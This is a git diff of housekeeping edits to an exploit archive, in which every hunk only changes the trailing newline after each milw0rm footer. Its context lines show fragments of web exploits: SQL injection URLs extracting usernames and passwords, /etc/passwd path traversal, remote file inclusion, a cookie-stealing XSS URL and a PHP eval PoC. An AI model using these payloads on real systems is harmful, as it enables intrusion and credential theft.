2006 by ASDIS : ### I'm TRYAGI ;) -- Tryag.cc/cc -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5130.txt b/platforms/php/webapps/5130.txt index 19d833173..0dd8edc7a 100755 --- a/platforms/php/webapps/5130.txt +++ b/platforms/php/webapps/5130.txt @@ -143,4 +143,4 @@ print "\n [-] Exploit gagal ;) - magic_quotes_gpc = on"; exit(); } -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5131.pl b/platforms/php/webapps/5131.pl index adfac0a0e..60d6c6d17 100755 --- a/platforms/php/webapps/5131.pl +++ b/platforms/php/webapps/5131.pl @@ -35,4 +35,4 @@ my $victim = $ARGV[0]; print "\n[-] exploit failed\n"; } -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5132.txt b/platforms/php/webapps/5132.txt index da45fc961..b17c508f2 100755 --- a/platforms/php/webapps/5132.txt +++ b/platforms/php/webapps/5132.txt @@ -36,4 +36,4 @@ index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/** 2.6.8 jooget!download manager semplificato per joomla!. -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5133.txt b/platforms/php/webapps/5133.txt index 96cc41fe5..0c206bcf1 100755 --- a/platforms/php/webapps/5133.txt +++ b/platforms/php/webapps/5133.txt @@ -35,4 +35,4 @@ index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/se 1.0 Un ricettario illustrato per Mambo realizzato da Giorgio Nordo per www.equal.it e basato sul componente Wines 1.1 di Tommaso Tamantini. -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5134.txt b/platforms/php/webapps/5134.txt index 99a3d2328..e2fdde0b2 100755 --- a/platforms/php/webapps/5134.txt +++ b/platforms/php/webapps/5134.txt @@ -25,4 +25,4 @@ index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/sel # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5135.txt b/platforms/php/webapps/5135.txt index 3c9b2e746..8f82803f4 100755 --- a/platforms/php/webapps/5135.txt +++ b/platforms/php/webapps/5135.txt @@ -25,4 +25,4 @@ S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-16] +# milw0rm.com [2008-02-16] \ No newline at end of file diff --git a/platforms/php/webapps/5136.txt b/platforms/php/webapps/5136.txt index 985d093c0..c8ec54553 100755 --- a/platforms/php/webapps/5136.txt +++ b/platforms/php/webapps/5136.txt @@ -54,4 +54,4 @@ siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :))) ################################################# -# milw0rm.com [2008-02-17] +# milw0rm.com [2008-02-17] \ No newline at end of file diff --git a/platforms/php/webapps/5137.txt b/platforms/php/webapps/5137.txt index 19f5b89bc..d1e2b1d08 100755 --- a/platforms/php/webapps/5137.txt +++ b/platforms/php/webapps/5137.txt @@ -7,4 +7,4 @@ ### intitle:XPWeb 3.0.1 ### I'm tryagi .. TRYAG.Cc/cc -# milw0rm.com [2008-02-17] +# milw0rm.com [2008-02-17] \ No newline at end of file diff --git a/platforms/php/webapps/5138.txt b/platforms/php/webapps/5138.txt index 8af79d8ac..171fbaded 100755 --- a/platforms/php/webapps/5138.txt +++ b/platforms/php/webapps/5138.txt @@ -51,4 +51,4 @@ __EOF__ ]]> -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5139.txt b/platforms/php/webapps/5139.txt index c7761631e..6a7af4670 100755 --- a/platforms/php/webapps/5139.txt +++ b/platforms/php/webapps/5139.txt @@ -33,4 +33,4 @@ http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+se 1.0 Portfolio Manager Component -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5140.txt b/platforms/php/webapps/5140.txt index 3ae3d2c78..804011cbc 100755 --- a/platforms/php/webapps/5140.txt +++ b/platforms/php/webapps/5140.txt @@ -8,4 +8,4 @@ contact muuratsalo[at]gmail.com exploit http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00 -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5145.txt b/platforms/php/webapps/5145.txt index 90702eed2..e1b99f5d9 100755 --- a/platforms/php/webapps/5145.txt +++ b/platforms/php/webapps/5145.txt @@ -28,4 +28,4 @@ index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/* # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5146.txt b/platforms/php/webapps/5146.txt index a4c3cf3ae..7aa2a5c39 100755 --- a/platforms/php/webapps/5146.txt +++ b/platforms/php/webapps/5146.txt @@ -26,4 +26,4 @@ index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/* # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5147.txt b/platforms/php/webapps/5147.txt index 2607d381e..1075139cd 100755 --- a/platforms/php/webapps/5147.txt +++ b/platforms/php/webapps/5147.txt @@ -33,4 +33,4 @@ EXPLOİT 2 : # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5148.txt b/platforms/php/webapps/5148.txt index 10c76369b..37ee74df3 100755 --- a/platforms/php/webapps/5148.txt +++ b/platforms/php/webapps/5148.txt @@ -26,4 +26,4 @@ print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),0,concat # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5149.txt b/platforms/php/webapps/5149.txt index e590bbe58..89a33ed7d 100755 --- a/platforms/php/webapps/5149.txt +++ b/platforms/php/webapps/5149.txt @@ -703,4 +703,4 @@ class General scss = Ownstance.new(set) scss.checkversion(set[:host] ,set[:path]) -# milw0rm.com [2008-02-18] +# milw0rm.com [2008-02-18] \ No newline at end of file diff --git a/platforms/php/webapps/5154.txt b/platforms/php/webapps/5154.txt index 7c61353ff..ecada93a0 100755 --- a/platforms/php/webapps/5154.txt +++ b/platforms/php/webapps/5154.txt @@ -27,4 +27,4 @@ EXPLOIT : # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-19] +# milw0rm.com [2008-02-19] \ No newline at end of file diff --git a/platforms/php/webapps/5155.txt b/platforms/php/webapps/5155.txt index 18276da1e..0b61a1a38 100755 --- a/platforms/php/webapps/5155.txt +++ b/platforms/php/webapps/5155.txt @@ -20,4 +20,4 @@ sadece bi bug 16000+ hit sadece milw0rm;) Herzmn kral benimdir! ------------------------------------------------------------------------------- -# milw0rm.com [2008-02-19] +# milw0rm.com [2008-02-19] \ No newline at end of file diff --git a/platforms/php/webapps/5156.txt b/platforms/php/webapps/5156.txt index 695a569e2..47059f58b 100755 --- a/platforms/php/webapps/5156.txt +++ b/platforms/php/webapps/5156.txt @@ -30,4 +30,4 @@ for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/* # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-19] +# milw0rm.com [2008-02-19] \ No newline at end of file diff --git a/platforms/php/webapps/5157.txt b/platforms/php/webapps/5157.txt index 900e0e2df..21efb222f 100755 --- a/platforms/php/webapps/5157.txt +++ b/platforms/php/webapps/5157.txt @@ -30,4 +30,4 @@ EXPLOIT : # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-19] +# milw0rm.com [2008-02-19] \ No newline at end of file diff --git a/platforms/php/webapps/5158.txt b/platforms/php/webapps/5158.txt index 59f59f3c4..ddac76640 100755 --- a/platforms/php/webapps/5158.txt +++ b/platforms/php/webapps/5158.txt @@ -27,4 +27,4 @@ EXPLOIT : # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-19] +# milw0rm.com [2008-02-19] \ No newline at end of file diff --git a/platforms/php/webapps/5159.txt b/platforms/php/webapps/5159.txt index 2ca4d7c71..dec8c1e3c 100755 --- a/platforms/php/webapps/5159.txt +++ b/platforms/php/webapps/5159.txt @@ -19,4 +19,4 @@ Thanx: str0ke, s@bun. =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5160.txt b/platforms/php/webapps/5160.txt index e52a64da3..1f7cbc3d3 100755 --- a/platforms/php/webapps/5160.txt +++ b/platforms/php/webapps/5160.txt @@ -25,4 +25,4 @@ index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-999999 # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5161.txt b/platforms/php/webapps/5161.txt index b9d4293fe..af019fdca 100755 --- a/platforms/php/webapps/5161.txt +++ b/platforms/php/webapps/5161.txt @@ -19,4 +19,4 @@ Example: http://www.xxx.com.ar/mt/ ######################################################################### -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5162.txt b/platforms/php/webapps/5162.txt index 6820ea09c..047e35f5a 100755 --- a/platforms/php/webapps/5162.txt +++ b/platforms/php/webapps/5162.txt @@ -3,4 +3,4 @@ http://switch.dl.sourceforge.net/sourceforge/globsy/globsy_1.0.tar.gz /globsy_edit.php?file=globsy_config.php /globsy_edit.php?file=../../../../../../../etc/passwd -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5163.txt b/platforms/php/webapps/5163.txt index 68e53a1df..f13be52c8 100755 --- a/platforms/php/webapps/5163.txt +++ b/platforms/php/webapps/5163.txt @@ -20,4 +20,4 @@ Greetz: Str0ke , biyofrm.com , indir21.com , sibersavascilar.com , tryag.cc ///////////////////////////////////////// -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5164.php b/platforms/php/webapps/5164.php index 3c8cc8efd..442727df4 100755 --- a/platforms/php/webapps/5164.php +++ b/platforms/php/webapps/5164.php @@ -167,4 +167,4 @@ start($pos +1, 48); } ?> -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5165.php b/platforms/php/webapps/5165.php index 55611170f..023daa4b4 100755 --- a/platforms/php/webapps/5165.php +++ b/platforms/php/webapps/5165.php @@ -116,4 +116,4 @@ function random_pass($len) return $password; } -# milw0rm.com [2008-02-21] +# milw0rm.com [2008-02-21] \ No newline at end of file diff --git a/platforms/php/webapps/5166.htm b/platforms/php/webapps/5166.htm index a98044572..19a23e358 100755 --- a/platforms/php/webapps/5166.htm +++ b/platforms/php/webapps/5166.htm @@ -103,4 +103,4 @@ function Login() { -# milw0rm.com [2008-02-20] +# milw0rm.com [2008-02-20] \ No newline at end of file diff --git a/platforms/php/webapps/5168.txt b/platforms/php/webapps/5168.txt index e72142ca5..60cd1e6f7 100755 --- a/platforms/php/webapps/5168.txt +++ b/platforms/php/webapps/5168.txt @@ -19,4 +19,4 @@ Thanx: str0ke, =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= -# milw0rm.com [2008-02-21] +# milw0rm.com [2008-02-21] \ No newline at end of file diff --git a/platforms/php/webapps/5169.txt b/platforms/php/webapps/5169.txt index 27b5b4040..07dc357f7 100755 --- a/platforms/php/webapps/5169.txt +++ b/platforms/php/webapps/5169.txt @@ -69,4 +69,4 @@ print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from # S@BUN i AM NOT HACKER S@BUN ################################################################ -# milw0rm.com [2008-02-21] +# milw0rm.com [2008-02-21] \ No newline at end of file diff --git a/platforms/php/webapps/5170.txt b/platforms/php/webapps/5170.txt index d5761f621..43d2bc7e0 100755 --- a/platforms/php/webapps/5170.txt +++ b/platforms/php/webapps/5170.txt @@ -18,4 +18,4 @@ Alayına İsyan Kralına Hodri Meydan Sozum Metehan'a ;) Hadi eyw. side note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM) -# milw0rm.com [2008-02-21] +# milw0rm.com [2008-02-21] \ No newline at end of file diff --git a/platforms/php/webapps/5171.txt b/platforms/php/webapps/5171.txt index 045188fa3..e80664e78 100755 --- a/platforms/php/webapps/5171.txt +++ b/platforms/php/webapps/5171.txt @@ -29,4 +29,4 @@ Below XSS may be executed without logging into the OSSIM. http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- -# milw0rm.com [2008-02-21] +# milw0rm.com [2008-02-21] \ No newline at end of file diff --git a/platforms/php/webapps/5172.txt b/platforms/php/webapps/5172.txt index 3f9b7ee44..a2e56092d 100755 --- a/platforms/php/webapps/5172.txt +++ b/platforms/php/webapps/5172.txt @@ -40,4 +40,4 @@ NukeC 2.1 is only work on PHP-Nuke 6.5. Please Download 2.0 or earlier for PHP-N ################################################################################### -# milw0rm.com [2008-02-21] +# milw0rm.com [2008-02-21] \ No newline at end of file diff --git a/platforms/php/webapps/5173.txt b/platforms/php/webapps/5173.txt index 371996193..4a25e7812 100755 --- a/platforms/php/webapps/5173.txt +++ b/platforms/php/webapps/5173.txt @@ -17,4 +17,4 @@ Tryag TeaM & All Members Of My Forum # Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake Best Wishes -# milw0rm.com [2008-02-22] +# milw0rm.com [2008-02-22] \ No newline at end of file diff --git a/platforms/php/webapps/5174.txt b/platforms/php/webapps/5174.txt index 293e0b803..242ae262f 100755 --- a/platforms/php/webapps/5174.txt +++ b/platforms/php/webapps/5174.txt @@ -18,4 +18,4 @@ Tryag TeaM & All Members Of My Forum # Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake Best Wishes -# milw0rm.com [2008-02-22] +# milw0rm.com [2008-02-22] \ No newline at end of file diff --git a/platforms/php/webapps/5176.txt b/platforms/php/webapps/5176.txt index a94719420..07e5a434c 100755 --- a/platforms/php/webapps/5176.txt +++ b/platforms/php/webapps/5176.txt @@ -4,4 +4,4 @@ ### /quinsonnas-1.55/footer.php?op[footer_body]=http://localhost/020.txt? ### I'm Tryagi - Tryag.Cc/cc - :) -# milw0rm.com [2008-02-23] +# milw0rm.com [2008-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/5177.txt b/platforms/php/webapps/5177.txt index 3c765f18e..6cd8271ff 100755 --- a/platforms/php/webapps/5177.txt +++ b/platforms/php/webapps/5177.txt @@ -35,4 +35,4 @@ index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+s www.galore.co.za 2.0 -# milw0rm.com [2008-02-23] +# milw0rm.com [2008-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/5178.txt b/platforms/php/webapps/5178.txt index 4fc852e1c..d272922cc 100755 --- a/platforms/php/webapps/5178.txt +++ b/platforms/php/webapps/5178.txt @@ -38,4 +38,4 @@ index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+sel 1.1.1 Garys Cookbook is a fully integrated Mambo Cookbook component. -# milw0rm.com [2008-02-23] +# milw0rm.com [2008-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/5179.txt b/platforms/php/webapps/5179.txt index 1fe8f9ee8..ba117adc0 100755 --- a/platforms/php/webapps/5179.txt +++ b/platforms/php/webapps/5179.txt @@ -25,4 +25,4 @@ #Thnx : " XbrainhunterX (Mehmet Akif) XX Parti :D " ##################################################### -# milw0rm.com [2008-02-23] +# milw0rm.com [2008-02-23] \ No newline at end of file diff --git a/platforms/php/webapps/5181.txt b/platforms/php/webapps/5181.txt index b8ac2ccd7..60400c9ff 100755 --- a/platforms/php/webapps/5181.txt +++ b/platforms/php/webapps/5181.txt @@ -154,4 +154,4 @@ The-0utl4w -# milw0rm.com [2008-02-24] +# milw0rm.com [2008-02-24] \ No newline at end of file diff --git a/platforms/php/webapps/5182.txt b/platforms/php/webapps/5182.txt index df44ac11a..3ee258b8d 100755 --- a/platforms/php/webapps/5182.txt +++ b/platforms/php/webapps/5182.txt @@ -9,4 +9,4 @@ ### /PwP2.5.1.1/?page=../../../../../../../../etc/passwd ### I'm Tryagi - Tryag.Cc/cc - Mahmood_ali :) -# milw0rm.com [2008-02-24] +# milw0rm.com [2008-02-24] \ No newline at end of file diff --git a/platforms/php/webapps/5183.txt b/platforms/php/webapps/5183.txt index 7e520c367..336118de2 100755 --- a/platforms/php/webapps/5183.txt +++ b/platforms/php/webapps/5183.txt @@ -32,4 +32,4 @@ # Thnx : Ekin0x - Fotosopar seni :D ##################################################### -# milw0rm.com [2008-02-24] +# milw0rm.com [2008-02-24] \ No newline at end of file diff --git a/platforms/php/webapps/5186.txt b/platforms/php/webapps/5186.txt index 7c0aee637..48f68d706 100755 --- a/platforms/php/webapps/5186.txt +++ b/platforms/php/webapps/5186.txt @@ -44,4 +44,4 @@ modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F% Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq -# milw0rm.com [2008-02-25] +# milw0rm.com [2008-02-25] \ No newline at end of file diff --git a/platforms/php/webapps/5189.pl b/platforms/php/webapps/5189.pl index df27eb23f..0a26e8d68 100755 --- a/platforms/php/webapps/5189.pl +++ b/platforms/php/webapps/5189.pl @@ -58,4 +58,4 @@ else die "Error: ".$response->status_line; } -# milw0rm.com [2008-02-25] +# milw0rm.com [2008-02-25] \ No newline at end of file diff --git a/platforms/php/webapps/5192.pl b/platforms/php/webapps/5192.pl index 513d17837..f264bc4e0 100755 --- a/platforms/php/webapps/5192.pl +++ b/platforms/php/webapps/5192.pl @@ -112,4 +112,4 @@ print "\n Usage: nukedit.pl \n"; print " ex. : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n"; } -# milw0rm.com [2008-02-26] +# milw0rm.com [2008-02-26] \ No newline at end of file diff --git a/platforms/php/webapps/5194.txt b/platforms/php/webapps/5194.txt index 44a34dca6..0dc4c2577 100755 --- a/platforms/php/webapps/5194.txt +++ b/platforms/php/webapps/5194.txt @@ -48,4 +48,4 @@ eval ('?>'.$text); Poc: http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22); -# milw0rm.com [2008-02-26] +# milw0rm.com [2008-02-26] \ No newline at end of file diff --git a/platforms/php/webapps/5195.txt b/platforms/php/webapps/5195.txt index f83506229..611e9d4a8 100755 --- a/platforms/php/webapps/5195.txt +++ b/platforms/php/webapps/5195.txt @@ -21,4 +21,4 @@ http://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+sele ## Together, we have strength =) #### www.antichat.ru ######################################################### -# milw0rm.com [2008-02-27] +# milw0rm.com [2008-02-27] \ No newline at end of file diff --git a/platforms/php/webapps/5196.pl b/platforms/php/webapps/5196.pl index 410d90fba..0f857f2a2 100755 --- a/platforms/php/webapps/5196.pl +++ b/platforms/php/webapps/5196.pl @@ -103,4 +103,4 @@ else die "Error: ".$response->status_line; } -# milw0rm.com [2008-02-27] +# milw0rm.com [2008-02-27] \ No newline at end of file diff --git a/platforms/php/webapps/5198.txt b/platforms/php/webapps/5198.txt index 2332c7d7b..b3b996704 100755 --- a/platforms/php/webapps/5198.txt +++ b/platforms/php/webapps/5198.txt @@ -18,4 +18,4 @@ + Erbay O ÅŸimdi asker :D Vatan Size Emanet KardeÅŸim Allah Yardımcınız oLsun. -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/php/webapps/5199.txt b/platforms/php/webapps/5199.txt index ec82b57ab..251daebda 100755 --- a/platforms/php/webapps/5199.txt +++ b/platforms/php/webapps/5199.txt @@ -23,4 +23,4 @@ http://www.example.com/files/carprss.php?CarpPath=[Evil_Code] [*]---------------------------------------------------------- -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/php/webapps/5200.txt b/platforms/php/webapps/5200.txt index 3c9de6940..49f100d87 100755 --- a/platforms/php/webapps/5200.txt +++ b/platforms/php/webapps/5200.txt @@ -22,4 +22,4 @@ ### /podcastgen1.0beta2/download.php?filename=../../../../../../../../../etc/passwd @@@@@@@ ANA TRYAGI @@@@@@@ -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/php/webapps/5202.txt b/platforms/php/webapps/5202.txt index ac72ef86e..97619b31d 100755 --- a/platforms/php/webapps/5202.txt +++ b/platforms/php/webapps/5202.txt @@ -23,4 +23,4 @@ http://www.example.com/main.php?pageURL=[Evil_Code] [*]---------------------------------------------------------- -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/php/webapps/5203.txt b/platforms/php/webapps/5203.txt index 74c4981d6..d69e271df 100755 --- a/platforms/php/webapps/5203.txt +++ b/platforms/php/webapps/5203.txt @@ -13,4 +13,4 @@ The-0utl4w Original Link: http://forum.aria-security.net/showthread.php?p=1490 -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/php/webapps/5204.py b/platforms/php/webapps/5204.py index 42106d414..a0f58602f 100755 --- a/platforms/php/webapps/5204.py +++ b/platforms/php/webapps/5204.py @@ -37,4 +37,4 @@ if __name__ == "__main__": else: print "./Poc.py HOST" -# milw0rm.com [2008-02-28] +# milw0rm.com [2008-02-28] \ No newline at end of file diff --git a/platforms/php/webapps/5206.txt b/platforms/php/webapps/5206.txt index 90482d251..43c012b2a 100755 --- a/platforms/php/webapps/5206.txt +++ b/platforms/php/webapps/5206.txt @@ -31,4 +31,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-02-29] +# milw0rm.com [2008-02-29] \ No newline at end of file diff --git a/platforms/php/webapps/5207.txt b/platforms/php/webapps/5207.txt index e1ca98f0f..711290546 100755 --- a/platforms/php/webapps/5207.txt +++ b/platforms/php/webapps/5207.txt @@ -13,4 +13,4 @@ http://forum.aria-security.net/showthread.php?t=588 Regards, The-0utl4w -# milw0rm.com [2008-03-01] +# milw0rm.com [2008-03-01] \ No newline at end of file diff --git a/platforms/php/webapps/5208.txt b/platforms/php/webapps/5208.txt index c5e2194c5..ecf85f071 100755 --- a/platforms/php/webapps/5208.txt +++ b/platforms/php/webapps/5208.txt @@ -26,4 +26,4 @@ # Mini.Spider,and All 7shasha Boards Members! # ############################################################################ -# milw0rm.com [2008-03-01] +# milw0rm.com [2008-03-01] \ No newline at end of file diff --git a/platforms/php/webapps/5209.txt b/platforms/php/webapps/5209.txt index 35ba207c5..bcdc1f1cc 100755 --- a/platforms/php/webapps/5209.txt +++ b/platforms/php/webapps/5209.txt @@ -16,4 +16,4 @@ Greatz : Eno7 - Crackers_Child - Thehacker - Ghost61 - Tilkiandre - Edoras - The Special Greatz : str0ke and SuSkun (since 2003 :) HoÅŸgeldin Suskun Abi. -# milw0rm.com [2008-03-01] +# milw0rm.com [2008-03-01] \ No newline at end of file diff --git a/platforms/php/webapps/5211.txt b/platforms/php/webapps/5211.txt index 57c02edd9..0f98634ab 100755 --- a/platforms/php/webapps/5211.txt +++ b/platforms/php/webapps/5211.txt @@ -12,4 +12,4 @@ album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,passwor Regards The-0utl4w -# milw0rm.com [2008-03-01] +# milw0rm.com [2008-03-01] \ No newline at end of file diff --git a/platforms/php/webapps/5214.txt b/platforms/php/webapps/5214.txt index 55276b807..f5039b18f 100755 --- a/platforms/php/webapps/5214.txt +++ b/platforms/php/webapps/5214.txt @@ -44,4 +44,4 @@ google dork : Powered by Mitra Informatika Solusindo ##############################MY LOVE JUST FOR U Dina Mariance######################### ######################################E.O.F################################## -# milw0rm.com [2008-03-04] +# milw0rm.com [2008-03-04] \ No newline at end of file diff --git a/platforms/php/webapps/5216.txt b/platforms/php/webapps/5216.txt index 2c23acb5b..5dc7f93d7 100755 --- a/platforms/php/webapps/5216.txt +++ b/platforms/php/webapps/5216.txt @@ -28,4 +28,4 @@ modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/** side note: Glossario 2.2 Per Xoops 2.X è stato adattato da Martialito da http://www.toplenet.com -# milw0rm.com [2008-03-06] +# milw0rm.com [2008-03-06] \ No newline at end of file diff --git a/platforms/php/webapps/5218.txt b/platforms/php/webapps/5218.txt index cbe7b8a5f..b6be9086b 100755 --- a/platforms/php/webapps/5218.txt +++ b/platforms/php/webapps/5218.txt @@ -27,4 +27,4 @@ modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,c ##S@BUN######hackturkiye.hackturkiye@gmail.com####S@BUN######### ################################################################ -# milw0rm.com [2008-03-06] +# milw0rm.com [2008-03-06] \ No newline at end of file diff --git a/platforms/php/webapps/5219.php b/platforms/php/webapps/5219.php index 236e2dc48..ead6cb908 100755 --- a/platforms/php/webapps/5219.php +++ b/platforms/php/webapps/5219.php @@ -52,4 +52,4 @@ function post($url,$data,$get=1) ?> -# milw0rm.com [2008-03-07] +# milw0rm.com [2008-03-07] \ No newline at end of file diff --git a/platforms/php/webapps/5220.php b/platforms/php/webapps/5220.php index 276f2d498..f85be8bfb 100755 --- a/platforms/php/webapps/5220.php +++ b/platforms/php/webapps/5220.php @@ -91,4 +91,4 @@ function post($url,$data,$get=1) ?> -# milw0rm.com [2008-03-07] +# milw0rm.com [2008-03-07] \ No newline at end of file diff --git a/platforms/php/webapps/5221.txt b/platforms/php/webapps/5221.txt index 00e964cbb..8c7db4edf 100755 --- a/platforms/php/webapps/5221.txt +++ b/platforms/php/webapps/5221.txt @@ -37,4 +37,4 @@ index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,us 1.0.0 Candle Component. -# milw0rm.com [2008-03-08] +# milw0rm.com [2008-03-08] \ No newline at end of file diff --git a/platforms/php/webapps/5222.txt b/platforms/php/webapps/5222.txt index 93c6d5785..42a9eae43 100755 --- a/platforms/php/webapps/5222.txt +++ b/platforms/php/webapps/5222.txt @@ -40,4 +40,4 @@ ^_ irc.rmachine.net #w4ck1ng _^ ^_ m@cro.li _^ -# milw0rm.com [2008-03-09] +# milw0rm.com [2008-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/5223.txt b/platforms/php/webapps/5223.txt index 394708ac0..e5f8d461a 100755 --- a/platforms/php/webapps/5223.txt +++ b/platforms/php/webapps/5223.txt @@ -46,4 +46,4 @@ pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(us Thanx :str0ke, pc faresi, s@bun,D3ng3s!z,hayalet,Turque,SmoKin -# milw0rm.com [2008-03-09] +# milw0rm.com [2008-03-09] \ No newline at end of file diff --git a/platforms/php/webapps/5226.txt b/platforms/php/webapps/5226.txt index c777c28e4..e6796a374 100755 --- a/platforms/php/webapps/5226.txt +++ b/platforms/php/webapps/5226.txt @@ -22,4 +22,4 @@ Mambo ++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2008-03-10] +# milw0rm.com [2008-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/5231.php b/platforms/php/webapps/5231.php index 1d6b95dd4..897f22ffb 100755 --- a/platforms/php/webapps/5231.php +++ b/platforms/php/webapps/5231.php @@ -51,4 +51,4 @@ function get($url,$get=1) ?> -# milw0rm.com [2008-03-10] +# milw0rm.com [2008-03-10] \ No newline at end of file diff --git a/platforms/php/webapps/5232.txt b/platforms/php/webapps/5232.txt index 9a0334a25..f213e219e 100755 --- a/platforms/php/webapps/5232.txt +++ b/platforms/php/webapps/5232.txt @@ -136,4 +136,4 @@ security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/5233.txt b/platforms/php/webapps/5233.txt index 618ae00f7..a7b24ac16 100755 --- a/platforms/php/webapps/5233.txt +++ b/platforms/php/webapps/5233.txt @@ -116,4 +116,4 @@ security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/5234.txt b/platforms/php/webapps/5234.txt index 930e7b244..fce009303 100755 --- a/platforms/php/webapps/5234.txt +++ b/platforms/php/webapps/5234.txt @@ -31,4 +31,4 @@ I think there are other sql 